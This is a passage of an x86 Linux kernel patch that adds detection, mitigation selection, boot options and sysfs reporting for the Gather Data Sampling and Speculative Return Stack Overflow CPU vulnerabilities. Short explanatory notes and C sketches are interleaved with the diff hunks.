+  */
+@@ -464,5 +472,8 @@
+ #define X86_BUG_RETBLEED		X86_BUG(27) /* CPU is affected by RETBleed */
+ #define X86_BUG_EIBRS_PBRSB		X86_BUG(28) /* EIBRS is vulnerable to Post Barrier RSB Predictions */
+ #define X86_BUG_SMT_RSB			X86_BUG(29) /* CPU is vulnerable to Cross-Thread Return Address Predictions */
++#define X86_BUG_GDS			X86_BUG(30) /* CPU is affected by Gather Data Sampling */
+ 
++/* BUG word 2 */
++#define X86_BUG_SRSO			X86_BUG(1*32 + 0) /* AMD SRSO bug */
+ #endif /* _ASM_X86_CPUFEATURES_H */
+diff --git a/arch/x86/include/asm/disabled-features.h b/arch/x86/include/asm/disabled-features.h
+index 33d2cd04d2544..000037078db43 100644
+--- a/arch/x86/include/asm/disabled-features.h
++++ b/arch/x86/include/asm/disabled-features.h
+@@ -111,6 +111,7 @@
+ #define DISABLED_MASK17	0
+ #define DISABLED_MASK18	0
+ #define DISABLED_MASK19	0
+-#define DISABLED_MASK_CHECK BUILD_BUG_ON_ZERO(NCAPINTS != 20)
++#define DISABLED_MASK20	0
++#define DISABLED_MASK_CHECK BUILD_BUG_ON_ZERO(NCAPINTS != 21)
+ 
+ #endif /* _ASM_X86_DISABLED_FEATURES_H */
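
Growing NCAPINTS from 20 to 21 means every required/disabled mask header
must gain a word-20 entry, and the BUILD_BUG_ON_ZERO(NCAPINTS != 21)
terms enforce that at build time. A reduced sketch of the guard (the
BUILD_BUG_ON_ZERO definition matches the kernel's; the surrounding names
are simplified):

/* A negative-width bitfield is a compile error, so the expression below
 * only compiles when 'e' is false - i.e. when the mask table and
 * NCAPINTS agree.
 */
#define BUILD_BUG_ON_ZERO(e) ((int)(sizeof(struct { int:(-!!(e)); })))

#define NCAPINTS 21

/* fails the build if a mask header still assumes 20 feature words */
#define MASK_TABLE_CHECK BUILD_BUG_ON_ZERO(NCAPINTS != 21)
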
+diff --git a/arch/x86/include/asm/fpu/api.h b/arch/x86/include/asm/fpu/api.h
+index 503a577814b2e..b475d9a582b88 100644
+--- a/arch/x86/include/asm/fpu/api.h
++++ b/arch/x86/include/asm/fpu/api.h
+@@ -109,7 +109,7 @@ extern void fpu_reset_from_exception_fixup(void);
+ 
+ /* Boot, hotplug and resume */
+ extern void fpu__init_cpu(void);
+-extern void fpu__init_system(struct cpuinfo_x86 *c);
++extern void fpu__init_system(void);
+ extern void fpu__init_check_bugs(void);
+ extern void fpu__resume_cpu(void);
+ 
+diff --git a/arch/x86/include/asm/mem_encrypt.h b/arch/x86/include/asm/mem_encrypt.h
+index 72ca90552b6a4..8f513372cd8d4 100644
+--- a/arch/x86/include/asm/mem_encrypt.h
++++ b/arch/x86/include/asm/mem_encrypt.h
+@@ -17,6 +17,12 @@
+ 
+ #include <asm/bootparam.h>
+ 
++#ifdef CONFIG_X86_MEM_ENCRYPT
++void __init mem_encrypt_init(void);
++#else
++static inline void mem_encrypt_init(void) { }
++#endif
++
+ #ifdef CONFIG_AMD_MEM_ENCRYPT
+ 
+ extern u64 sme_me_mask;
+@@ -86,9 +92,6 @@ static inline void mem_encrypt_free_decrypted_mem(void) { }
+ 
+ #endif	/* CONFIG_AMD_MEM_ENCRYPT */
+ 
+-/* Architecture __weak replacement functions */
+-void __init mem_encrypt_init(void);
+-
+ void add_encrypt_protection_map(void);
+ 
+ /*
+diff --git a/arch/x86/include/asm/msr-index.h b/arch/x86/include/asm/msr-index.h
+index 846067e1ee8bb..52d8c67d93081 100644
+--- a/arch/x86/include/asm/msr-index.h
++++ b/arch/x86/include/asm/msr-index.h
+@@ -60,6 +60,7 @@
+ 
+ #define MSR_IA32_PRED_CMD		0x00000049 /* Prediction Command */
+ #define PRED_CMD_IBPB			BIT(0)	   /* Indirect Branch Prediction Barrier */
++#define PRED_CMD_SBPB			BIT(7)	   /* Selective Branch Prediction Barrier */
+ 
+ #define MSR_PPIN_CTL			0x0000004e
+ #define MSR_PPIN			0x0000004f
+@@ -158,6 +159,15 @@
+ 						 * Not susceptible to Post-Barrier
+ 						 * Return Stack Buffer Predictions.
+ 						 */
++#define ARCH_CAP_GDS_CTRL		BIT(25)	/*
++						 * CPU is vulnerable to Gather
++						 * Data Sampling (GDS) and
++						 * has controls for mitigation.
++						 */
++#define ARCH_CAP_GDS_NO			BIT(26)	/*
++						 * CPU is not vulnerable to Gather
++						 * Data Sampling (GDS).
++						 */
+ 
+ #define ARCH_CAP_XAPIC_DISABLE		BIT(21)	/*
+ 						 * IA32_XAPIC_DISABLE_STATUS MSR
+@@ -181,6 +191,8 @@
+ #define RNGDS_MITG_DIS			BIT(0)	/* SRBDS support */
+ #define RTM_ALLOW			BIT(1)	/* TSX development mode */
+ #define FB_CLEAR_DIS			BIT(3)	/* CPU Fill buffer clear disable */
++#define GDS_MITG_DIS			BIT(4)	/* Disable GDS mitigation */
++#define GDS_MITG_LOCKED			BIT(5)	/* GDS mitigation locked */
+ 
+ #define MSR_IA32_SYSENTER_CS		0x00000174
+ #define MSR_IA32_SYSENTER_ESP		0x00000175
+diff --git a/arch/x86/include/asm/nospec-branch.h b/arch/x86/include/asm/nospec-branch.h
+index dfdb103ae4f6f..31fa631c8587c 100644
+--- a/arch/x86/include/asm/nospec-branch.h
++++ b/arch/x86/include/asm/nospec-branch.h
+@@ -112,7 +112,7 @@
+  * eventually turn into it's own annotation.
+  */
+ .macro ANNOTATE_UNRET_END
+-#ifdef CONFIG_DEBUG_ENTRY
++#if (defined(CONFIG_CPU_UNRET_ENTRY) || defined(CONFIG_CPU_SRSO))
+ 	ANNOTATE_RETPOLINE_SAFE
+ 	nop
+ #endif
+@@ -185,12 +185,18 @@
+  * where we have a stack but before any RET instruction.
+  */
+ .macro UNTRAIN_RET
+-#if defined(CONFIG_CPU_UNRET_ENTRY) || defined(CONFIG_CPU_IBPB_ENTRY)
++#if defined(CONFIG_CPU_UNRET_ENTRY) || defined(CONFIG_CPU_IBPB_ENTRY) || \
++	defined(CONFIG_CPU_SRSO)
+ 	ANNOTATE_UNRET_END
+ 	ALTERNATIVE_2 "",						\
+ 	              CALL_ZEN_UNTRAIN_RET, X86_FEATURE_UNRET,		\
+ 		      "call entry_ibpb", X86_FEATURE_ENTRY_IBPB
+ #endif
++
++#ifdef CONFIG_CPU_SRSO
++	ALTERNATIVE_2 "", "call srso_untrain_ret", X86_FEATURE_SRSO, \
++			  "call srso_untrain_ret_alias", X86_FEATURE_SRSO_ALIAS
++#endif
+ .endm
+ 
+ #else /* __ASSEMBLY__ */
+@@ -206,6 +212,8 @@ extern retpoline_thunk_t __x86_indirect_thunk_array[];
+ 
+ extern void __x86_return_thunk(void);
+ extern void zen_untrain_ret(void);
++extern void srso_untrain_ret(void);
++extern void srso_untrain_ret_alias(void);
+ extern void entry_ibpb(void);
+ 
+ #ifdef CONFIG_RETPOLINE
+@@ -311,11 +319,11 @@ void alternative_msr_write(unsigned int msr, u64 val, unsigned int feature)
+ 		: "memory");
+ }
+ 
++extern u64 x86_pred_cmd;
++
+ static inline void indirect_branch_prediction_barrier(void)
+ {
+-	u64 val = PRED_CMD_IBPB;
+-
+-	alternative_msr_write(MSR_IA32_PRED_CMD, val, X86_FEATURE_USE_IBPB);
++	alternative_msr_write(MSR_IA32_PRED_CMD, x86_pred_cmd, X86_FEATURE_USE_IBPB);
+ }
+ 
+ /* The Intel SPEC CTRL MSR base value cache */
+diff --git a/arch/x86/include/asm/processor.h b/arch/x86/include/asm/processor.h
+index d8277eec1bcd6..c13e4ff8ec70c 100644
+--- a/arch/x86/include/asm/processor.h
++++ b/arch/x86/include/asm/processor.h
+@@ -800,9 +800,11 @@ extern u16 get_llc_id(unsigned int cpu);
+ #ifdef CONFIG_CPU_SUP_AMD
+ extern u32 amd_get_nodes_per_socket(void);
+ extern u32 amd_get_highest_perf(void);
++extern bool cpu_has_ibpb_brtype_microcode(void);
+ #else
+ static inline u32 amd_get_nodes_per_socket(void)	{ return 0; }
+ static inline u32 amd_get_highest_perf(void)		{ return 0; }
++static inline bool cpu_has_ibpb_brtype_microcode(void)	{ return false; }
+ #endif
+ 
+ #define for_each_possible_hypervisor_cpuid_base(function) \
+diff --git a/arch/x86/include/asm/required-features.h b/arch/x86/include/asm/required-features.h
+index aff774775c678..7ba1726b71c7b 100644
+--- a/arch/x86/include/asm/required-features.h
++++ b/arch/x86/include/asm/required-features.h
+@@ -98,6 +98,7 @@
+ #define REQUIRED_MASK17	0
+ #define REQUIRED_MASK18	0
+ #define REQUIRED_MASK19	0
+-#define REQUIRED_MASK_CHECK BUILD_BUG_ON_ZERO(NCAPINTS != 20)
++#define REQUIRED_MASK20	0
++#define REQUIRED_MASK_CHECK BUILD_BUG_ON_ZERO(NCAPINTS != 21)
+ 
+ #endif /* _ASM_X86_REQUIRED_FEATURES_H */
+diff --git a/arch/x86/include/asm/sigframe.h b/arch/x86/include/asm/sigframe.h
+index 5b1ed650b1248..84eab27248754 100644
+--- a/arch/x86/include/asm/sigframe.h
++++ b/arch/x86/include/asm/sigframe.h
+@@ -85,6 +85,4 @@ struct rt_sigframe_x32 {
+ 
+ #endif /* CONFIG_X86_64 */
+ 
+-void __init init_sigframe_size(void);
+-
+ #endif /* _ASM_X86_SIGFRAME_H */
+diff --git a/arch/x86/kernel/cpu/amd.c b/arch/x86/kernel/cpu/amd.c
+index 7f4eb8b027cc8..7f0cf4a959c02 100644
+--- a/arch/x86/kernel/cpu/amd.c
++++ b/arch/x86/kernel/cpu/amd.c
+@@ -1245,6 +1245,25 @@ u32 amd_get_highest_perf(void)
+ }
+ EXPORT_SYMBOL_GPL(amd_get_highest_perf);
+ 
++bool cpu_has_ibpb_brtype_microcode(void)
++{
++	switch (boot_cpu_data.x86) {
++	/* Zen1/2 IBPB flushes branch type predictions too. */
++	case 0x17:
++		return boot_cpu_has(X86_FEATURE_AMD_IBPB);
++	case 0x19:
++		/* Poke the MSR bit on Zen3/4 to check its presence. */
++		if (!wrmsrl_safe(MSR_IA32_PRED_CMD, PRED_CMD_SBPB)) {
++			setup_force_cpu_cap(X86_FEATURE_SBPB);
++			return true;
++		} else {
++			return false;
++		}
++	default:
++		return false;
++	}
++}
++
+ static void zenbleed_check_cpu(void *unused)
+ {
+ 	struct cpuinfo_x86 *c = &cpu_data(smp_processor_id());
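
cpu_has_ibpb_brtype_microcode() above relies on the probe-by-write idiom:
wrmsrl_safe() returns nonzero when the WRMSR faults, so attempting to set
PRED_CMD_SBPB doubles as the capability test on Zen3/4. The bare pattern,
as a sketch mirroring the hunk (not additional kernel code):

/* wrmsrl_safe() catches the #GP raised for an unsupported MSR bit and
 * returns nonzero, so a successful write proves support. The SBPB write
 * itself is harmless - it merely issues a barrier.
 */
static bool msr_write_supported(u32 msr, u64 val)
{
	return !wrmsrl_safe(msr, val);
}

/* usage: msr_write_supported(MSR_IA32_PRED_CMD, PRED_CMD_SBPB) */
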
+diff --git a/arch/x86/kernel/cpu/bugs.c b/arch/x86/kernel/cpu/bugs.c
+index f54992887491e..d98f33ea57e47 100644
+--- a/arch/x86/kernel/cpu/bugs.c
++++ b/arch/x86/kernel/cpu/bugs.c
+@@ -9,7 +9,6 @@
+  *	- Andrew D. Balsa (code cleanup).
+  */
+ #include <linux/init.h>
+-#include <linux/utsname.h>
+ #include <linux/cpu.h>
+ #include <linux/module.h>
+ #include <linux/nospec.h>
+@@ -27,8 +26,6 @@
+ #include <asm/msr.h>
+ #include <asm/vmx.h>
+ #include <asm/paravirt.h>
+-#include <asm/alternative.h>
+-#include <asm/set_memory.h>
+ #include <asm/intel-family.h>
+ #include <asm/e820/api.h>
+ #include <asm/hypervisor.h>
+@@ -49,6 +46,8 @@ static void __init taa_select_mitigation(void);
+ static void __init mmio_select_mitigation(void);
+ static void __init srbds_select_mitigation(void);
+ static void __init l1d_flush_select_mitigation(void);
++static void __init gds_select_mitigation(void);
++static void __init srso_select_mitigation(void);
+ 
+ /* The base value of the SPEC_CTRL MSR without task-specific bits set */
+ u64 x86_spec_ctrl_base;
+@@ -58,6 +57,9 @@ EXPORT_SYMBOL_GPL(x86_spec_ctrl_base);
+ DEFINE_PER_CPU(u64, x86_spec_ctrl_current);
+ EXPORT_SYMBOL_GPL(x86_spec_ctrl_current);
+ 
++u64 x86_pred_cmd __ro_after_init = PRED_CMD_IBPB;
++EXPORT_SYMBOL_GPL(x86_pred_cmd);
++
+ static DEFINE_MUTEX(spec_ctrl_mutex);
+ 
+ /* Update SPEC_CTRL MSR and its cached copy unconditionally */
+@@ -124,21 +126,8 @@ DEFINE_STATIC_KEY_FALSE(switch_mm_cond_l1d_flush);
+ DEFINE_STATIC_KEY_FALSE(mmio_stale_data_clear);
+ EXPORT_SYMBOL_GPL(mmio_stale_data_clear);
+ 
+-void __init check_bugs(void)
++void __init cpu_select_mitigations(void)
+ {
+-	identify_boot_cpu();
+-
+-	/*
+-	 * identify_boot_cpu() initialized SMT support information, let the
+-	 * core code know.
+-	 */
+-	cpu_smt_check_topology();
+-
+-	if (!IS_ENABLED(CONFIG_SMP)) {
+-		pr_info("CPU: ");
+-		print_cpu_info(&boot_cpu_data);
+-	}
+-
+ 	/*
+ 	 * Read the SPEC_CTRL MSR to account for reserved bits which may
+ 	 * have unknown values. AMD64_LS_CFG MSR is cached in the early AMD
+@@ -175,39 +164,8 @@ void __init check_bugs(void)
+ 	md_clear_select_mitigation();
+ 	srbds_select_mitigation();
+ 	l1d_flush_select_mitigation();
+-
+-	arch_smt_update();
+-
+-#ifdef CONFIG_X86_32
+-	/*
+-	 * Check whether we are able to run this kernel safely on SMP.
+-	 *
+-	 * - i386 is no longer supported.
+-	 * - In order to run on anything without a TSC, we need to be
+-	 *   compiled for a i486.
+-	 */
+-	if (boot_cpu_data.x86 < 4)
+-		panic("Kernel requires i486+ for 'invlpg' and other features");
+-
+-	init_utsname()->machine[1] =
+-		'0' + (boot_cpu_data.x86 > 6 ? 6 : boot_cpu_data.x86);
+-	alternative_instructions();
+-
+-	fpu__init_check_bugs();
+-#else /* CONFIG_X86_64 */
+-	alternative_instructions();
+-
+-	/*
+-	 * Make sure the first 2MB area is not mapped by huge pages
+-	 * There are typically fixed size MTRRs in there and overlapping
+-	 * MTRRs into large pages causes slow downs.
+-	 *
+-	 * Right now we don't do that with gbpages because there seems
+-	 * very little benefit for that case.
+-	 */
+-	if (!direct_gbpages)
+-		set_memory_4k((unsigned long)__va(0), 1);
+-#endif
++	gds_select_mitigation();
++	srso_select_mitigation();
+ }
+ 
+ /*
+@@ -693,6 +651,149 @@ static int __init l1d_flush_parse_cmdline(char *str)
+ }
+ early_param("l1d_flush", l1d_flush_parse_cmdline);
+ 
++#undef pr_fmt
++#define pr_fmt(fmt)	"GDS: " fmt
++
++enum gds_mitigations {
++	GDS_MITIGATION_OFF,
++	GDS_MITIGATION_UCODE_NEEDED,
++	GDS_MITIGATION_FORCE,
++	GDS_MITIGATION_FULL,
++	GDS_MITIGATION_FULL_LOCKED,
++	GDS_MITIGATION_HYPERVISOR,
++};
++
++#if IS_ENABLED(CONFIG_GDS_FORCE_MITIGATION)
++static enum gds_mitigations gds_mitigation __ro_after_init = GDS_MITIGATION_FORCE;
++#else
++static enum gds_mitigations gds_mitigation __ro_after_init = GDS_MITIGATION_FULL;
++#endif
++
++static const char * const gds_strings[] = {
++	[GDS_MITIGATION_OFF]		= "Vulnerable",
++	[GDS_MITIGATION_UCODE_NEEDED]	= "Vulnerable: No microcode",
++	[GDS_MITIGATION_FORCE]		= "Mitigation: AVX disabled, no microcode",
++	[GDS_MITIGATION_FULL]		= "Mitigation: Microcode",
++	[GDS_MITIGATION_FULL_LOCKED]	= "Mitigation: Microcode (locked)",
++	[GDS_MITIGATION_HYPERVISOR]	= "Unknown: Dependent on hypervisor status",
++};
++
++bool gds_ucode_mitigated(void)
++{
++	return (gds_mitigation == GDS_MITIGATION_FULL ||
++		gds_mitigation == GDS_MITIGATION_FULL_LOCKED);
++}
++EXPORT_SYMBOL_GPL(gds_ucode_mitigated);
++
++void update_gds_msr(void)
++{
++	u64 mcu_ctrl_after;
++	u64 mcu_ctrl;
++
++	switch (gds_mitigation) {
++	case GDS_MITIGATION_OFF:
++		rdmsrl(MSR_IA32_MCU_OPT_CTRL, mcu_ctrl);
++		mcu_ctrl |= GDS_MITG_DIS;
++		break;
++	case GDS_MITIGATION_FULL_LOCKED:
++		/*
++		 * The LOCKED state comes from the boot CPU. APs might not have
++		 * the same state. Make sure the mitigation is enabled on all
++		 * CPUs.
++		 */
++	case GDS_MITIGATION_FULL:
++		rdmsrl(MSR_IA32_MCU_OPT_CTRL, mcu_ctrl);
++		mcu_ctrl &= ~GDS_MITG_DIS;
++		break;
++	case GDS_MITIGATION_FORCE:
++	case GDS_MITIGATION_UCODE_NEEDED:
++	case GDS_MITIGATION_HYPERVISOR:
++		return;
++	}
++
++	wrmsrl(MSR_IA32_MCU_OPT_CTRL, mcu_ctrl);
++
++	/*
++	 * Check to make sure that the WRMSR value was not ignored. Writes to
++	 * GDS_MITG_DIS will be ignored if this processor is locked but the boot
++	 * processor was not.
++	 */
++	rdmsrl(MSR_IA32_MCU_OPT_CTRL, mcu_ctrl_after);
++	WARN_ON_ONCE(mcu_ctrl != mcu_ctrl_after);
++}
++
++static void __init gds_select_mitigation(void)
++{
++	u64 mcu_ctrl;
++
++	if (!boot_cpu_has_bug(X86_BUG_GDS))
++		return;
++
++	if (boot_cpu_has(X86_FEATURE_HYPERVISOR)) {
++		gds_mitigation = GDS_MITIGATION_HYPERVISOR;
++		goto out;
++	}
++
++	if (cpu_mitigations_off())
++		gds_mitigation = GDS_MITIGATION_OFF;
++	/* Will verify below that mitigation _can_ be disabled */
++
++	/* No microcode */
++	if (!(x86_read_arch_cap_msr() & ARCH_CAP_GDS_CTRL)) {
++		if (gds_mitigation == GDS_MITIGATION_FORCE) {
++			/*
++			 * This only needs to be done on the boot CPU so do it
++			 * here rather than in update_gds_msr()
++			 */
++			setup_clear_cpu_cap(X86_FEATURE_AVX);
++			pr_warn("Microcode update needed! Disabling AVX as mitigation.\n");
++		} else {
++			gds_mitigation = GDS_MITIGATION_UCODE_NEEDED;
++		}
++		goto out;
++	}
++
++	/* Microcode has mitigation, use it */
++	if (gds_mitigation == GDS_MITIGATION_FORCE)
++		gds_mitigation = GDS_MITIGATION_FULL;
++
++	rdmsrl(MSR_IA32_MCU_OPT_CTRL, mcu_ctrl);
++	if (mcu_ctrl & GDS_MITG_LOCKED) {
++		if (gds_mitigation == GDS_MITIGATION_OFF)
++			pr_warn("Mitigation locked. Disable failed.\n");
++
++		/*
++		 * The mitigation is selected from the boot CPU. All other CPUs
++		 * _should_ have the same state. If the boot CPU isn't locked
++		 * but others are then update_gds_msr() will WARN() of the state
++		 * mismatch. If the boot CPU is locked update_gds_msr() will
++		 * ensure the other CPUs have the mitigation enabled.
++		 */
++		gds_mitigation = GDS_MITIGATION_FULL_LOCKED;
++	}
++
++	update_gds_msr();
++out:
++	pr_info("%s\n", gds_strings[gds_mitigation]);
++}
++
++static int __init gds_parse_cmdline(char *str)
++{
++	if (!str)
++		return -EINVAL;
++
++	if (!boot_cpu_has_bug(X86_BUG_GDS))
++		return 0;
++
++	if (!strcmp(str, "off"))
++		gds_mitigation = GDS_MITIGATION_OFF;
++	else if (!strcmp(str, "force"))
++		gds_mitigation = GDS_MITIGATION_FORCE;
++
++	return 0;
++}
++early_param("gather_data_sampling", gds_parse_cmdline);
++
+ #undef pr_fmt
+ #define pr_fmt(fmt)     "Spectre V1 : " fmt
+ 
+@@ -2207,6 +2308,165 @@ static int __init l1tf_cmdline(char *str)
+ }
+ early_param("l1tf", l1tf_cmdline);
+ 
++#undef pr_fmt
++#define pr_fmt(fmt)	"Speculative Return Stack Overflow: " fmt
++
++enum srso_mitigation {
++	SRSO_MITIGATION_NONE,
++	SRSO_MITIGATION_MICROCODE,
++	SRSO_MITIGATION_SAFE_RET,
++	SRSO_MITIGATION_IBPB,
++	SRSO_MITIGATION_IBPB_ON_VMEXIT,
++};
++
++enum srso_mitigation_cmd {
++	SRSO_CMD_OFF,
++	SRSO_CMD_MICROCODE,
++	SRSO_CMD_SAFE_RET,
++	SRSO_CMD_IBPB,
++	SRSO_CMD_IBPB_ON_VMEXIT,
++};
++
++static const char * const srso_strings[] = {
++	[SRSO_MITIGATION_NONE]           = "Vulnerable",
++	[SRSO_MITIGATION_MICROCODE]      = "Mitigation: microcode",
++	[SRSO_MITIGATION_SAFE_RET]	 = "Mitigation: safe RET",
++	[SRSO_MITIGATION_IBPB]		 = "Mitigation: IBPB",
++	[SRSO_MITIGATION_IBPB_ON_VMEXIT] = "Mitigation: IBPB on VMEXIT only"
++};
++
++static enum srso_mitigation srso_mitigation __ro_after_init = SRSO_MITIGATION_NONE;
++static enum srso_mitigation_cmd srso_cmd __ro_after_init = SRSO_CMD_SAFE_RET;
++
++static int __init srso_parse_cmdline(char *str)
++{
++	if (!str)
++		return -EINVAL;
++
++	if (!strcmp(str, "off"))
++		srso_cmd = SRSO_CMD_OFF;
++	else if (!strcmp(str, "microcode"))
++		srso_cmd = SRSO_CMD_MICROCODE;
++	else if (!strcmp(str, "safe-ret"))
++		srso_cmd = SRSO_CMD_SAFE_RET;
++	else if (!strcmp(str, "ibpb"))
++		srso_cmd = SRSO_CMD_IBPB;
++	else if (!strcmp(str, "ibpb-vmexit"))
++		srso_cmd = SRSO_CMD_IBPB_ON_VMEXIT;
++	else
++		pr_err("Ignoring unknown SRSO option (%s).", str);
++
++	return 0;
++}
++early_param("spec_rstack_overflow", srso_parse_cmdline);
++
++#define SRSO_NOTICE "WARNING: See https://kernel.org/doc/html/latest/admin-guide/hw-vuln/srso.html for mitigation options."
++
++static void __init srso_select_mitigation(void)
++{
++	bool has_microcode;
++
++	if (!boot_cpu_has_bug(X86_BUG_SRSO) || cpu_mitigations_off())
++		goto pred_cmd;
++
++	/*
++	 * The first check is for the kernel running as a guest in order
++	 * for guests to verify whether IBPB is a viable mitigation.
++	 */
++	has_microcode = boot_cpu_has(X86_FEATURE_IBPB_BRTYPE) || cpu_has_ibpb_brtype_microcode();
++	if (!has_microcode) {
++		pr_warn("IBPB-extending microcode not applied!\n");
++		pr_warn(SRSO_NOTICE);
++	} else {
++		/*
++		 * Enable the synthetic (even if in a real CPUID leaf)
++		 * flags for guests.
++		 */
++		setup_force_cpu_cap(X86_FEATURE_IBPB_BRTYPE);
++
++		/*
++		 * Zen1/2 with SMT off aren't vulnerable after the right
++		 * IBPB microcode has been applied.
++		 */
++		if ((boot_cpu_data.x86 < 0x19) &&
++		    (!cpu_smt_possible() || (cpu_smt_control == CPU_SMT_DISABLED)))
++			setup_force_cpu_cap(X86_FEATURE_SRSO_NO);
++	}
++
++	if (retbleed_mitigation == RETBLEED_MITIGATION_IBPB) {
++		if (has_microcode) {
++			pr_err("Retbleed IBPB mitigation enabled, using same for SRSO\n");
++			srso_mitigation = SRSO_MITIGATION_IBPB;
++			goto pred_cmd;
++		}
++	}
++
++	switch (srso_cmd) {
++	case SRSO_CMD_OFF:
++		return;
++
++	case SRSO_CMD_MICROCODE:
++		if (has_microcode) {
++			srso_mitigation = SRSO_MITIGATION_MICROCODE;
++			pr_warn(SRSO_NOTICE);
++		}
++		break;
++
++	case SRSO_CMD_SAFE_RET:
++		if (IS_ENABLED(CONFIG_CPU_SRSO)) {
++			/*
++			 * Enable the return thunk for generated code
++			 * like ftrace, static_call, etc.
++			 */
++			setup_force_cpu_cap(X86_FEATURE_RETHUNK);
++
++			if (boot_cpu_data.x86 == 0x19)
++				setup_force_cpu_cap(X86_FEATURE_SRSO_ALIAS);
++			else
++				setup_force_cpu_cap(X86_FEATURE_SRSO);
++			srso_mitigation = SRSO_MITIGATION_SAFE_RET;
++		} else {
++			pr_err("WARNING: kernel not compiled with CPU_SRSO.\n");
++			goto pred_cmd;
++		}
++		break;
++
++	case SRSO_CMD_IBPB:
++		if (IS_ENABLED(CONFIG_CPU_IBPB_ENTRY)) {
++			if (has_microcode) {
++				setup_force_cpu_cap(X86_FEATURE_ENTRY_IBPB);
++				srso_mitigation = SRSO_MITIGATION_IBPB;
++			}
++		} else {
++			pr_err("WARNING: kernel not compiled with CPU_IBPB_ENTRY.\n");
++			goto pred_cmd;
++		}
++		break;
++
++	case SRSO_CMD_IBPB_ON_VMEXIT:
++		if (IS_ENABLED(CONFIG_CPU_SRSO)) {
++			if (!boot_cpu_has(X86_FEATURE_ENTRY_IBPB) && has_microcode) {
++				setup_force_cpu_cap(X86_FEATURE_IBPB_ON_VMEXIT);
++				srso_mitigation = SRSO_MITIGATION_IBPB_ON_VMEXIT;
++			}
++		} else {
++			pr_err("WARNING: kernel not compiled with CPU_SRSO.\n");
++			goto pred_cmd;
++                }
++		break;
++
++	default:
++		break;
++	}
++
++	pr_info("%s%s\n", srso_strings[srso_mitigation], (has_microcode ? "" : ", no microcode"));
++
++pred_cmd:
++	if ((boot_cpu_has(X86_FEATURE_SRSO_NO) || srso_cmd == SRSO_CMD_OFF) &&
++	     boot_cpu_has(X86_FEATURE_SBPB))
++		x86_pred_cmd = PRED_CMD_SBPB;
++}
++
+ #undef pr_fmt
+ #define pr_fmt(fmt) fmt
+ 
+@@ -2405,6 +2665,18 @@ static ssize_t retbleed_show_state(char *buf)
+ 	return sprintf(buf, "%s\n", retbleed_strings[retbleed_mitigation]);
+ }
+ 
++static ssize_t gds_show_state(char *buf)
++{
++	return sysfs_emit(buf, "%s\n", gds_strings[gds_mitigation]);
++}
++
++static ssize_t srso_show_state(char *buf)
++{
++	return sysfs_emit(buf, "%s%s\n",
++			  srso_strings[srso_mitigation],
++			  (cpu_has_ibpb_brtype_microcode() ? "" : ", no microcode"));
++}
++
+ static ssize_t cpu_show_common(struct device *dev, struct device_attribute *attr,
+ 			       char *buf, unsigned int bug)
+ {
+@@ -2454,6 +2726,12 @@ static ssize_t cpu_show_common(struct device *dev, struct device_attribute *attr
+ 	case X86_BUG_RETBLEED:
+ 		return retbleed_show_state(buf);
+ 
++	case X86_BUG_GDS:
++		return gds_show_state(buf);
++
++	case X86_BUG_SRSO:
++		return srso_show_state(buf);
++
+ 	default:
+ 		break;
+ 	}
+@@ -2518,4 +2796,14 @@ ssize_t cpu_show_retbleed(struct device *dev, struct device_attribute *attr, cha
+ {
+ 	return cpu_show_common(dev, attr, buf, X86_BUG_RETBLEED);
+ }
++
++ssize_t cpu_show_gds(struct device *dev, struct device_attribute *attr, char *buf)
++{
++	return cpu_show_common(dev, attr, buf, X86_BUG_GDS);
++}
++
++ssize_t cpu_show_spec_rstack_overflow(struct device *dev, struct device_attribute *attr, char *buf)
++{
++	return cpu_show_common(dev, attr, buf, X86_BUG_SRSO);
++}
+ #endif
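
With the two cpu_show_*() handlers added, both new bugs are reported
alongside the existing entries under
/sys/devices/system/cpu/vulnerabilities; upstream names the GDS file
gather_data_sampling, though that sysfs hunk is outside this excerpt, so
treat the exact name as an assumption. A sketch (userspace, not from the
patch) that dumps the whole directory:

#include <dirent.h>
#include <stdio.h>

int main(void)
{
	const char *dir = "/sys/devices/system/cpu/vulnerabilities";
	struct dirent *de;
	DIR *d = opendir(dir);

	if (!d) {
		perror(dir);
		return 1;
	}
	while ((de = readdir(d)) != NULL) {
		char path[512], line[256];
		FILE *f;

		if (de->d_name[0] == '.')
			continue;
		snprintf(path, sizeof(path), "%s/%s", dir, de->d_name);
		f = fopen(path, "r");
		if (!f)
			continue;
		if (fgets(line, sizeof(line), f))
			printf("%-28s %s", de->d_name, line);
		fclose(f);
	}
	closedir(d);
	return 0;
}
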
+diff --git a/arch/x86/kernel/cpu/common.c b/arch/x86/kernel/cpu/common.c
+index d298d70f74ce6..d38ae25e7c01f 100644
+--- a/arch/x86/kernel/cpu/common.c
++++ b/arch/x86/kernel/cpu/common.c
+@@ -18,11 +18,15 @@
+ #include <linux/init.h>
+ #include <linux/kprobes.h>
+ #include <linux/kgdb.h>
++#include <linux/mem_encrypt.h>
+ #include <linux/smp.h>
++#include <linux/cpu.h>
+ #include <linux/io.h>
+ #include <linux/syscore_ops.h>
+ #include <linux/pgtable.h>
++#include <linux/utsname.h>
+ 
++#include <asm/alternative.h>
+ #include <asm/cmdline.h>
+ #include <asm/stackprotector.h>
+ #include <asm/perf_event.h>
+@@ -58,7 +62,7 @@
+ #include <asm/intel-family.h>
+ #include <asm/cpu_device_id.h>
+ #include <asm/uv/uv.h>
+-#include <asm/sigframe.h>
++#include <asm/set_memory.h>
+ #include <asm/traps.h>
+ #include <asm/sev.h>
+ 
+@@ -1072,6 +1076,9 @@ void get_cpu_cap(struct cpuinfo_x86 *c)
+ 	if (c->extended_cpuid_level >= 0x8000001f)
+ 		c->x86_capability[CPUID_8000_001F_EAX] = cpuid_eax(0x8000001f);
+ 
++	if (c->extended_cpuid_level >= 0x80000021)
++		c->x86_capability[CPUID_8000_0021_EAX] = cpuid_eax(0x80000021);
++
+ 	init_scattered_cpuid_features(c);
+ 	init_speculation_control(c);
+ 
+@@ -1237,6 +1244,10 @@ static const __initconst struct x86_cpu_id cpu_vuln_whitelist[] = {
+ #define RETBLEED	BIT(3)
+ /* CPU is affected by SMT (cross-thread) return predictions */
+ #define SMT_RSB		BIT(4)
++/* CPU is affected by SRSO */
++#define SRSO		BIT(5)
++/* CPU is affected by GDS */
++#define GDS		BIT(6)
+ 
+ static const struct x86_cpu_id cpu_vuln_blacklist[] __initconst = {
+ 	VULNBL_INTEL_STEPPINGS(IVYBRIDGE,	X86_STEPPING_ANY,		SRBDS),
+@@ -1249,27 +1260,30 @@ static const struct x86_cpu_id cpu_vuln_blacklist[] __initconst = {
+ 	VULNBL_INTEL_STEPPINGS(BROADWELL_X,	X86_STEPPING_ANY,		MMIO),
